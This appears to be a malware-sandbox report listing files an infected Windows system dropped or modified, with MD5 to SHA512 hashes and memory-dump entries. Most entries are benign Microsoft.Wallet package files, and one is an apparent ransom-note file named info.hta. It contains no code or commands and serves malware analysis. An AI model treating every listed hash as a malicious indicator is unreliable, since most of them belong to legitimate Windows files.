C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png

MD5 541abea8b402b4ddd7463b2cd1bf54ec
SHA1 e0bfa993adcc35d6cc955be49c2f952529660ad5
SHA256 d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16
SHA512 b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml

MD5 44628eb64853341f7678ec488959efe2
SHA1 60e37cb04f7941b6070d3ce035af3d434c78fbfd
SHA256 f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e
SHA512 0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml

MD5 5b333e85c957925ec5f7ae9c47872020
SHA1 97431745824321574e6e6c9666e79147b5a6ea67
SHA256 c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08
SHA512 377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

C:\Users\Admin\AppData\Local\Temp\30C4\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml

MD5 44628eb64853341f7678ec488959efe2
SHA1 60e37cb04f7941b6070d3ce035af3d434c78fbfd
SHA256 f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e
SHA512 0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

C:\Users\Admin\AppData\Local\Temp\30C4\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml

MD5 5b333e85c957925ec5f7ae9c47872020
SHA1 97431745824321574e6e6c9666e79147b5a6ea67
SHA256 c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08
SHA512 377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe

MD5 a4bd1ce8b5026e59037a3903cd6e4e3a
SHA1 352243b758a585cf869cd9f9354cd302463f4d9d
SHA256 39d69cd43e452c4899dbf1aa5b847c2a2d251fb8e13df9232ebdb5f0fdc3594c
SHA512 c86901a1bdcebc5721743fca6ac7f1909b64518e046752f3b412183db940563c088e0ec12613ad0b763c814bc3b6bf99dd3b6f8a6bce54add30a10d29e38400c

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSplashScreen.png

MD5 52bf805c4241200c576401a59f9e211a
SHA1 a10074a87d7c244fcee9b8d45005673aa48140a1
SHA256 adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c
SHA512 9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.targetsize-24_altform-unplated.png

MD5 2bb84fb822fe6ed44bf10bbf31122308
SHA1 e9049ca6522a736d75fc85b3b16a0ad0dc271334
SHA256 afb6768acc7e2229c7566d68dabf863bafdb8d59e2cca45f39370fc7261965dc
SHA512 1f24ca0e934881760a94c1f90d31ef6ccbab165d39c0155fb83b31e92abe4e5e3b70f49189f75d8cdd859796a55312f27c71fda0b8296e8cf30167a02d7391f5

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png

MD5 1572efa3e47162a7b2198893a362b803
SHA1 a291f6f1cae15d03d5ef0f748b83bee024aa2fca
SHA256 d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc
SHA512 4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png

MD5 0262d1daca4c1c1e22dec63b012e3641
SHA1 609258b00f17f2a9dd586fe5a7e485573ef477c9
SHA256 8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc
SHA512 a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd

MD5 64d3f93322e5e6932ad162365441301d
SHA1 832e1b6e6560f8dae2b8282b72a1d80545ea5891
SHA256 df52db081c34a78391d85832bcb2190a9417fb34e468d5f15e84ac1916a085cc
SHA512 86b8e1f699321c6eb187b597a08bdfdd4b47686681e495783b981ca82cfaaa8be22d1775143cfd0a6d3c7b381b419930609c8370e67a906eba9e1b6a5024eb20

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletWide310x150Logo.scale-200.png

MD5 52bf805c4241200c576401a59f9e211a
SHA1 a10074a87d7c244fcee9b8d45005673aa48140a1
SHA256 adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c
SHA512 9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletStoreLogo.png

MD5 08de9d6a366fb174872e8043e2384099
SHA1 955114d06eefae5e498797f361493ee607676d95
SHA256 0289105cf9484cf5427630866c0525b60f6193dea0afacd0224f997ce8103861
SHA512 59004a4920d5e3b80b642c285ff649a2ee5c52df25b6209be46d2f927a9c2ab170534ea0819c7c70292534ee08eb90e36630d11da18edba502776fac42872ed0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png

MD5 541abea8b402b4ddd7463b2cd1bf54ec
SHA1 e0bfa993adcc35d6cc955be49c2f952529660ad5
SHA256 d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16
SHA512 b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png

MD5 1572efa3e47162a7b2198893a362b803
SHA1 a291f6f1cae15d03d5ef0f748b83bee024aa2fca
SHA256 d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc
SHA512 4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png

MD5 0262d1daca4c1c1e22dec63b012e3641
SHA1 609258b00f17f2a9dd586fe5a7e485573ef477c9
SHA256 8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc
SHA512 a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png

MD5 541abea8b402b4ddd7463b2cd1bf54ec
SHA1 e0bfa993adcc35d6cc955be49c2f952529660ad5
SHA256 d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16
SHA512 b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml

MD5 44628eb64853341f7678ec488959efe2
SHA1 60e37cb04f7941b6070d3ce035af3d434c78fbfd
SHA256 f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e
SHA512 0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

C:\Users\Admin\AppData\Local\Temp\30C4\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml

MD5 5b333e85c957925ec5f7ae9c47872020
SHA1 97431745824321574e6e6c9666e79147b5a6ea67
SHA256 c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08
SHA512 377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

memory/4952-12661-0x0000000000400000-0x0000000000695000-memory.dmp

C:\info.hta

MD5 b5f673247b9ab1e525c64addb0ffef8e
SHA1 f04fc13ccb91e6c7b4138ab32056e390f0eb9d85
SHA256 8ab2c6439f58882f7ed5f21daef0c03013a5c226b8d78e1e1883918a44aeb713
SHA512 e4006d96145bca196db5e3cd5138ac378b065e0b1713d3ab2ef752ceb861111cf21434ddaf35f385a55253bdc8787a5eff60e855a65dc11c7989e130b8452677

memory/4952-13009-0x0000000000400000-0x0000000000695000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db

MD5 ae6fbded57f9f7d048b95468ddee47ca
SHA1 c4473ea845be2fb5d28a61efd72f19d74d5fc82e
SHA256 d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9
SHA512 f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 d5f14e76da2b7a406cac9051651405cc
SHA1 120ee8d035aec37b1d77fb85b72b995de1ae8896
SHA256 3aa2d0a600a2a69fe946352bdf92787df4501391c4455cb916a91c303ee603ed
SHA512 57f352c75fb605b39a46d10acb40a35671a65b71f5a52c3b9d8c8d09b58c35a9f94cecd54e049aa0a5cc6eb7732f7e1eaddab3368144d3e2a6c681881fcc1d9d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 2257fa8cef64a74c33655bd5f74ef5e5
SHA1 b9f8baf96166f99cb1983563e632e6e69984ad5c
SHA256 ead48b70e048de6ccca219a229ca90b49a9d1b9c14bf3a7c5eaad544294fcfd3
SHA512 7792be9b935a46a923e97bb76b76957070e116dcc4cb6fcd8b883c2d6f142285ebc9fd26cdf29bd19c8bdff412487f586abaa1724332b613e71afa45d7f3e4f9